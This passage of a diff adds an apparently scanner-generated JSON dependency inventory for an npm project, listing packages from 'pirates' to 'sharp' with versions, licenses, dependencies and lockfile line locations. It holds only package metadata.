"Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7769, + "EndLine": 7777 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "pirates@4.0.7", + "Name": "pirates", + "Identifier": { + "PURL": "pkg:npm/pirates@4.0.7", + "UID": "930ee0fad2fbb238" + }, + "Version": "4.0.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7778, + "EndLine": 7786 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "png-js@2.0.0", + "Name": "png-js", + "Identifier": { + "PURL": "pkg:npm/png-js@2.0.0", + "UID": "7e6d8bc79925c63d" + }, + "Version": "2.0.0", + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fflate@0.8.2" + ], + "Locations": [ + { + "StartLine": 7806, + "EndLine": 7813 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "pngjs@5.0.0", + "Name": "pngjs", + "Identifier": { + "PURL": "pkg:npm/pngjs@5.0.0", + "UID": "5593c4131fbd0f80" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7814, + "EndLine": 7822 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "postcss@8.4.31", + "Name": "postcss", + "Identifier": { + "PURL": "pkg:npm/postcss@8.4.31", + "UID": "d845910d063cee9a" + }, + "Version": "8.4.31", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "nanoid@3.3.11", + "picocolors@1.1.1", + "source-map-js@1.2.1" + ], + "Locations": [ + { + "StartLine": 7291, + "EndLine": 7318 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "postcss@8.5.12", + "Name": "postcss", + "Identifier": { + "PURL": "pkg:npm/postcss@8.5.12", + "UID": "535592c99142efd2" + }, + "Version": "8.5.12", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "nanoid@3.3.11", + "picocolors@1.1.1", + "source-map-js@1.2.1" + ], + "Locations": [ + { + "StartLine": 7823, + "EndLine": 7850 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "postcss-import@15.1.0", + "Name": "postcss-import", + "Identifier": { + "PURL": "pkg:npm/postcss-import@15.1.0", + "UID": "a40e4ea455a32a53" + }, + "Version": "15.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "postcss-value-parser@4.2.0", + "postcss@8.5.12", + "read-cache@1.0.0", + "resolve@1.22.12" + ], + "Locations": [ + { + "StartLine": 7851, + "EndLine": 7867 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "postcss-js@4.1.0", + "Name": "postcss-js", + "Identifier": { + "PURL": "pkg:npm/postcss-js@4.1.0", + "UID": "517b0f5f19d88c6b" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "camelcase-css@2.0.1", + "postcss@8.5.12" + ], + "Locations": [ + { + "StartLine": 7868, + "EndLine": 7892 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "postcss-load-config@6.0.1", + "Name": "postcss-load-config", + "Identifier": { + "PURL": "pkg:npm/postcss-load-config@6.0.1", + "UID": "d632112d3a54eee1" + }, + "Version": "6.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "jiti@1.21.7", + "lilconfig@3.1.3", + "postcss@8.5.12" + ], + "Locations": [ + { + "StartLine": 7893, + "EndLine": 7934 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "postcss-nested@6.2.0", + "Name": "postcss-nested", + "Identifier": { + "PURL": "pkg:npm/postcss-nested@6.2.0", + "UID": "2cc4c040c67a0164" + }, + "Version": "6.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "postcss-selector-parser@6.1.2", + "postcss@8.5.12" + ], + "Locations": [ + { + "StartLine": 7935, + "EndLine": 7959 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "postcss-selector-parser@6.1.2", + "Name": "postcss-selector-parser", + "Identifier": { + "PURL": "pkg:npm/postcss-selector-parser@6.1.2", + "UID": "4842c6bff457ee5e" + }, + "Version": "6.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cssesc@3.0.0", + "util-deprecate@1.0.2" + ], + "Locations": [ + { + "StartLine": 7960, + "EndLine": 7972 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "postcss-value-parser@4.2.0", + "Name": "postcss-value-parser", + "Identifier": { + "PURL": "pkg:npm/postcss-value-parser@4.2.0", + "UID": "2646489e5a59881d" + }, + "Version": "4.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7973, + "EndLine": 7978 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "prisma@5.22.0", + "Name": "prisma", + "Identifier": { + "PURL": "pkg:npm/prisma@5.22.0", + "UID": "e77327102255ddf5" + }, + "Version": "5.22.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@prisma/engines@5.22.0", + "fsevents@2.3.3" + ], + "Locations": [ + { + "StartLine": 8040, + "EndLine": 8059 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "process-nextick-args@2.0.1", + "Name": "process-nextick-args", + "Identifier": { + "PURL": "pkg:npm/process-nextick-args@2.0.1", + "UID": "f076343c63c6dabd" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8060, + "EndLine": 8065 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "prop-types@15.8.1", + "Name": "prop-types", + "Identifier": { + "PURL": "pkg:npm/prop-types@15.8.1", + "UID": "7529228c6b1b00a9" + }, + "Version": "15.8.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "loose-envify@1.4.0", + "object-assign@4.1.1", + "react-is@16.13.1" + ], + "Locations": [ + { + "StartLine": 8066, + "EndLine": 8076 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "proto-list@1.2.4", + "Name": "proto-list", + "Identifier": { + "PURL": "pkg:npm/proto-list@1.2.4", + "UID": "889223fc7d49a084" + }, + "Version": "1.2.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8077, + "EndLine": 8082 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "proto3-json-serializer@2.0.2", + "Name": "proto3-json-serializer", + "Identifier": { + "PURL": "pkg:npm/proto3-json-serializer@2.0.2", + "UID": "2489bec9a4b29c7f" + }, + "Version": "2.0.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "protobufjs@7.5.6" + ], + "Locations": [ + { + "StartLine": 8083, + "EndLine": 8095 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "protobufjs@7.5.6", + "Name": "protobufjs", + "Identifier": { + "PURL": "pkg:npm/protobufjs@7.5.6", + "UID": "11481e02f6a2a6cd" + }, + "Version": "7.5.6", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@protobufjs/aspromise@1.1.2", + "@protobufjs/base64@1.1.2", + "@protobufjs/codegen@2.0.5", + "@protobufjs/eventemitter@1.1.0", + "@protobufjs/fetch@1.1.0", + "@protobufjs/float@1.0.2", + "@protobufjs/inquire@1.1.1", + "@protobufjs/path@1.1.2", + "@protobufjs/pool@1.1.0", + "@protobufjs/utf8@1.1.1", + "@types/node@20.19.39", + "long@5.3.2" + ], + "Locations": [ + { + "StartLine": 8096, + "EndLine": 8120 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "proxy-addr@2.0.7", + "Name": "proxy-addr", + "Identifier": { + "PURL": "pkg:npm/proxy-addr@2.0.7", + "UID": "96f353fc63269ff0" + }, + "Version": "2.0.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "forwarded@0.2.0", + "ipaddr.js@1.9.1" + ], + "Locations": [ + { + "StartLine": 8121, + "EndLine": 8133 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "proxy-from-env@2.1.0", + "Name": "proxy-from-env", + "Identifier": { + "PURL": "pkg:npm/proxy-from-env@2.1.0", + "UID": "d996917dc6b72e1a" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8134, + "EndLine": 8142 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "qrcode@1.5.4", + "Name": "qrcode", + "Identifier": { + "PURL": "pkg:npm/qrcode@1.5.4", + "UID": "adf208b067bb5d3c" + }, + "Version": "1.5.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "dijkstrajs@1.0.3", + "pngjs@5.0.0", + "yargs@15.4.1" + ], + "Locations": [ + { + "StartLine": 8153, + "EndLine": 8169 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "qs@6.14.2", + "Name": "qs", + "Identifier": { + "PURL": "pkg:npm/qs@6.14.2", + "UID": "b18f6a32836a94eb" + }, + "Version": "6.14.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "side-channel@1.1.0" + ], + "Locations": [ + { + "StartLine": 8288, + "EndLine": 8302 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "qs@6.15.1", + "Name": "qs", + "Identifier": { + "PURL": "pkg:npm/qs@6.15.1", + "UID": "ae5aae433573a79c" + }, + "Version": "6.15.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "side-channel@1.1.0" + ], + "Locations": [ + { + "StartLine": 3715, + "EndLine": 3729 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "queue@6.0.2", + "Name": "queue", + "Identifier": { + "PURL": "pkg:npm/queue@6.0.2", + "UID": "9461b2f66f3a05b8" + }, + "Version": "6.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "inherits@2.0.4" + ], + "Locations": [ + { + "StartLine": 8303, + "EndLine": 8311 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "queue-microtask@1.2.3", + "Name": "queue-microtask", + "Identifier": { + "PURL": "pkg:npm/queue-microtask@1.2.3", + "UID": "28d00321bca14ebf" + }, + "Version": "1.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8312, + "EndLine": 8331 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "range-parser@1.2.1", + "Name": "range-parser", + "Identifier": { + "PURL": "pkg:npm/range-parser@1.2.1", + "UID": "720352a7122141fb" + }, + "Version": "1.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8332, + "EndLine": 8340 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "raw-body@2.5.3", + "Name": "raw-body", + "Identifier": { + "PURL": "pkg:npm/raw-body@2.5.3", + "UID": "5c4b35e29172ff4e" + }, + "Version": "2.5.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bytes@3.1.2", + "http-errors@2.0.1", + "iconv-lite@0.4.24", + "unpipe@1.0.0" + ], + "Locations": [ + { + "StartLine": 8341, + "EndLine": 8355 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react@18.3.1", + "Name": "react", + "Identifier": { + "PURL": "pkg:npm/react@18.3.1", + "UID": "793508ad6ccd2094" + }, + "Version": "18.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "loose-envify@1.4.0" + ], + "Locations": [ + { + "StartLine": 8356, + "EndLine": 8367 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-dom@18.3.1", + "Name": "react-dom", + "Identifier": { + "PURL": "pkg:npm/react-dom@18.3.1", + "UID": "ca45acb3cd7983fe" + }, + "Version": "18.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "loose-envify@1.4.0", + "react@18.3.1", + "scheduler@0.23.2" + ], + "Locations": [ + { + "StartLine": 8368, + "EndLine": 8380 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-is@16.13.1", + "Name": "react-is", + "Identifier": { + "PURL": "pkg:npm/react-is@16.13.1", + "UID": "d46eb836f2747e92" + }, + "Version": "16.13.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8390, + "EndLine": 8395 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-is@18.3.1", + "Name": "react-is", + "Identifier": { + "PURL": "pkg:npm/react-is@18.3.1", + "UID": "47328d916cb951e1" + }, + "Version": "18.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8033, + "EndLine": 8039 + }, + { + "StartLine": 8510, + "EndLine": 8515 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-promise-suspense@0.3.4", + "Name": "react-promise-suspense", + "Identifier": { + "PURL": "pkg:npm/react-promise-suspense@0.3.4", + "UID": "dde24a9cbdc13dba" + }, + "Version": "0.3.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fast-deep-equal@2.0.1" + ], + "Locations": [ + { + "StartLine": 8396, + "EndLine": 8404 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-smooth@4.0.4", + "Name": "react-smooth", + "Identifier": { + "PURL": "pkg:npm/react-smooth@4.0.4", + "UID": "4e47c4b221842e28" + }, + "Version": "4.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fast-equals@5.4.0", + "prop-types@15.8.1", + "react-dom@18.3.1", + "react-transition-group@4.4.5", + "react@18.3.1" + ], + "Locations": [ + { + "StartLine": 8411, + "EndLine": 8425 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-transition-group@4.4.5", + "Name": "react-transition-group", + "Identifier": { + "PURL": "pkg:npm/react-transition-group@4.4.5", + "UID": "c79ba97e675a2336" + }, + "Version": "4.4.5", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/runtime@7.29.2", + "dom-helpers@5.2.1", + "loose-envify@1.4.0", + "prop-types@15.8.1", + "react-dom@18.3.1", + "react@18.3.1" + ], + "Locations": [ + { + "StartLine": 8426, + "EndLine": 8441 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "read-cache@1.0.0", + "Name": "read-cache", + "Identifier": { + "PURL": "pkg:npm/read-cache@1.0.0", + "UID": "ff091ef4068a0683" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "pify@2.3.0" + ], + "Locations": [ + { + "StartLine": 8442, + "EndLine": 8450 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "readable-stream@2.3.8", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@2.3.8", + "UID": "e00c9bd04395a62f" + }, + "Version": "2.3.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "core-util-is@1.0.3", + "inherits@2.0.4", + "isarray@1.0.0", + "process-nextick-args@2.0.1", + "safe-buffer@5.1.2", + "string_decoder@1.1.1", + "util-deprecate@1.0.2" + ], + "Locations": [ + { + "StartLine": 4137, + "EndLine": 4151 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "readable-stream@3.6.2", + "Name": "readable-stream", + "Identifier": { + "PURL": "pkg:npm/readable-stream@3.6.2", + "UID": "ae61642956b90123" + }, + "Version": "3.6.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "inherits@2.0.4", + "string_decoder@1.3.0", + "util-deprecate@1.0.2" + ], + "Locations": [ + { + "StartLine": 8451, + "EndLine": 8465 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "readdirp@3.6.0", + "Name": "readdirp", + "Identifier": { + "PURL": "pkg:npm/readdirp@3.6.0", + "UID": "dbfcb09e9403c137" + }, + "Version": "3.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "picomatch@2.3.2" + ], + "Locations": [ + { + "StartLine": 8466, + "EndLine": 8477 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "recharts@2.15.4", + "Name": "recharts", + "Identifier": { + "PURL": "pkg:npm/recharts@2.15.4", + "UID": "17670f06bc38f173" + }, + "Version": "2.15.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "clsx@2.1.1", + "eventemitter3@4.0.7", + "lodash@4.18.1", + "react-dom@18.3.1", + "react-is@18.3.1", + "react-smooth@4.0.4", + "react@18.3.1", + "recharts-scale@0.4.5", + "tiny-invariant@1.3.3", + "victory-vendor@36.9.2" + ], + "Locations": [ + { + "StartLine": 8478, + "EndLine": 8500 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "recharts-scale@0.4.5", + "Name": "recharts-scale", + "Identifier": { + "PURL": "pkg:npm/recharts-scale@0.4.5", + "UID": "40055d5e399deaa2" + }, + "Version": "0.4.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "decimal.js-light@2.5.1" + ], + "Locations": [ + { + "StartLine": 8501, + "EndLine": 8509 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "redis-errors@1.2.0", + "Name": "redis-errors", + "Identifier": { + "PURL": "pkg:npm/redis-errors@1.2.0", + "UID": "7bdce8edd9554f41" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8516, + "EndLine": 8524 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "redis-parser@3.0.0", + "Name": "redis-parser", + "Identifier": { + "PURL": "pkg:npm/redis-parser@3.0.0", + "UID": "1a2c0645670033df" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "redis-errors@1.2.0" + ], + "Locations": [ + { + "StartLine": 8525, + "EndLine": 8536 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "require-directory@2.1.1", + "Name": "require-directory", + "Identifier": { + "PURL": "pkg:npm/require-directory@2.1.1", + "UID": "800db78158ed0a22" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8537, + "EndLine": 8545 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "require-from-string@2.0.2", + "Name": "require-from-string", + "Identifier": { + "PURL": "pkg:npm/require-from-string@2.0.2", + "UID": "5d3d6dd74419d318" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8546, + "EndLine": 8554 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "require-main-filename@2.0.0", + "Name": "require-main-filename", + "Identifier": { + "PURL": "pkg:npm/require-main-filename@2.0.0", + "UID": "886b34fc9a110322" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8555, + "EndLine": 8560 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "resend@3.5.0", + "Name": "resend", + "Identifier": { + "PURL": "pkg:npm/resend@3.5.0", + "UID": "535e5f3d1ff29249" + }, + "Version": "3.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-email/render@0.0.16" + ], + "Locations": [ + { + "StartLine": 8561, + "EndLine": 8572 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "resolve@1.22.12", + "Name": "resolve", + "Identifier": { + "PURL": "pkg:npm/resolve@1.22.12", + "UID": "573854130da77949" + }, + "Version": "1.22.12", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-errors@1.3.0", + "is-core-module@2.16.1", + "path-parse@1.0.7", + "supports-preserve-symlinks-flag@1.0.0" + ], + "Locations": [ + { + "StartLine": 8573, + "EndLine": 8593 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "restructure@3.0.2", + "Name": "restructure", + "Identifier": { + "PURL": "pkg:npm/restructure@3.0.2", + "UID": "b3be3037e1f803f8" + }, + "Version": "3.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8604, + "EndLine": 8609 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "retry@0.13.1", + "Name": "retry", + "Identifier": { + "PURL": "pkg:npm/retry@0.13.1", + "UID": "3b1fcacbd76c6cba" + }, + "Version": "0.13.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8610, + "EndLine": 8619 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "retry-request@7.0.2", + "Name": "retry-request", + "Identifier": { + "PURL": "pkg:npm/retry-request@7.0.2", + "UID": "530b3a2a3e94600a" + }, + "Version": "7.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/request@2.48.13", + "extend@3.0.2", + "teeny-request@9.0.0" + ], + "Locations": [ + { + "StartLine": 8620, + "EndLine": 8634 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "reusify@1.1.0", + "Name": "reusify", + "Identifier": { + "PURL": "pkg:npm/reusify@1.1.0", + "UID": "70c45a775b720075" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8635, + "EndLine": 8644 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "run-parallel@1.2.0", + "Name": "run-parallel", + "Identifier": { + "PURL": "pkg:npm/run-parallel@1.2.0", + "UID": "e1f8c74c7b06a03" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "queue-microtask@1.2.3" + ], + "Locations": [ + { + "StartLine": 8714, + "EndLine": 8736 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "safe-buffer@5.1.2", + "Name": "safe-buffer", + "Identifier": { + "PURL": "pkg:npm/safe-buffer@5.1.2", + "UID": "43360a99339ebc90" + }, + "Version": "5.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3633, + "EndLine": 3638 + }, + { + "StartLine": 4152, + "EndLine": 4157 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "safe-buffer@5.2.1", + "Name": "safe-buffer", + "Identifier": { + "PURL": "pkg:npm/safe-buffer@5.2.1", + "UID": "a2e193612bf00f88" + }, + "Version": "5.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8737, + "EndLine": 8756 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "safer-buffer@2.1.2", + "Name": "safer-buffer", + "Identifier": { + "PURL": "pkg:npm/safer-buffer@2.1.2", + "UID": "77eabef94235401" + }, + "Version": "2.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8757, + "EndLine": 8762 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "scheduler@0.17.0", + "Name": "scheduler", + "Identifier": { + "PURL": "pkg:npm/scheduler@0.17.0", + "UID": "30c71d60806180e0" + }, + "Version": "0.17.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "loose-envify@1.4.0", + "object-assign@4.1.1" + ], + "Locations": [ + { + "StartLine": 8763, + "EndLine": 8772 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "scheduler@0.23.2", + "Name": "scheduler", + "Identifier": { + "PURL": "pkg:npm/scheduler@0.23.2", + "UID": "fe4a6eb21e3bff16" + }, + "Version": "0.23.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "loose-envify@1.4.0" + ], + "Locations": [ + { + "StartLine": 8381, + "EndLine": 8389 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "scmp@2.1.0", + "Name": "scmp", + "Identifier": { + "PURL": "pkg:npm/scmp@2.1.0", + "UID": "ea9208c83d16449" + }, + "Version": "2.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8773, + "EndLine": 8779 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "selderee@0.11.0", + "Name": "selderee", + "Identifier": { + "PURL": "pkg:npm/selderee@0.11.0", + "UID": "19d1b29e508265a8" + }, + "Version": "0.11.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "parseley@0.12.1" + ], + "Locations": [ + { + "StartLine": 8780, + "EndLine": 8791 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "semver@7.7.4", + "Name": "semver", + "Identifier": { + "PURL": "pkg:npm/semver@7.7.4", + "UID": "ebcfd7f07a127e71" + }, + "Version": "7.7.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8792, + "EndLine": 8803 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "send@0.19.2", + "Name": "send", + "Identifier": { + "PURL": "pkg:npm/send@0.19.2", + "UID": "aaf843f833d5e23b" + }, + "Version": "0.19.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@2.6.9", + "depd@2.0.0", + "destroy@1.2.0", + "encodeurl@2.0.0", + "escape-html@1.0.3", + "etag@1.8.1", + "fresh@0.5.2", + "http-errors@2.0.1", + "mime@1.6.0", + "ms@2.1.3", + "on-finished@2.4.1", + "range-parser@1.2.1", + "statuses@2.0.2" + ], + "Locations": [ + { + "StartLine": 8804, + "EndLine": 8827 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "serve-static@1.16.3", + "Name": "serve-static", + "Identifier": { + "PURL": "pkg:npm/serve-static@1.16.3", + "UID": "bcee96944df5cb0" + }, + "Version": "1.16.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "encodeurl@2.0.0", + "escape-html@1.0.3", + "parseurl@1.3.3", + "send@0.19.2" + ], + "Locations": [ + { + "StartLine": 8855, + "EndLine": 8869 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "set-blocking@2.0.0", + "Name": "set-blocking", + "Identifier": { + "PURL": "pkg:npm/set-blocking@2.0.0", + "UID": "c44ff1c584396267" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8870, + "EndLine": 8875 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "setprototypeof@1.2.0", + "Name": "setprototypeof", + "Identifier": { + "PURL": "pkg:npm/setprototypeof@1.2.0", + "UID": "cff36d3bd50cb3aa" + }, + "Version": "1.2.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8876, + "EndLine": 8881 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "sharp@0.34.5", + "Name": "sharp", + "Identifier": { + "PURL": "pkg:npm/sharp@0.34.5", + "UID": "c0fc6fee91fa41bd" + }, + "Version": "0.34.5", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@img/colour@1.1.0", + "@img/sharp-darwin-arm64@0.34.5", + "@img/sharp-darwin-x64@0.34.5", + "@img/sharp-libvips-darwin-arm64@1.2.4", + "@img/sharp-libvips-darwin-x64@1.2.4", + "@img/sharp-libvips-linux-arm64@1.2.4", + "@img/sharp-libvips-linux-arm@1.2.4", + "@img/sharp-libvips-linux-ppc64@1.2.4", + "@img/sharp-libvips-linux-riscv64@1.2.4", + "@img/sharp-libvips-linux-s390x@1.2.4", + "@img/sharp-libvips-linux-x64@1.2.4", + "@img/sharp-libvips-linuxmusl-arm64@1.2.4", + "@img/sharp-libvips-linuxmusl-x64@1.2.4", + "@img/sharp-linux-arm64@0.34.5", + "@img/sharp-linux-arm@0.34.5", + "@img/sharp-linux-ppc64@0.34.5", + "@img/sharp-linux-riscv64@0.34.5", + "@img/sharp-linux-s390x@0.34.5", + "@img/sharp-linux-x64@0.34.5", + "@img/sharp-linuxmusl-arm64@0.34.5", + "@img/sharp-linuxmusl-x64@0.34.5", + "@img/sharp-wasm32@0.34.5", + 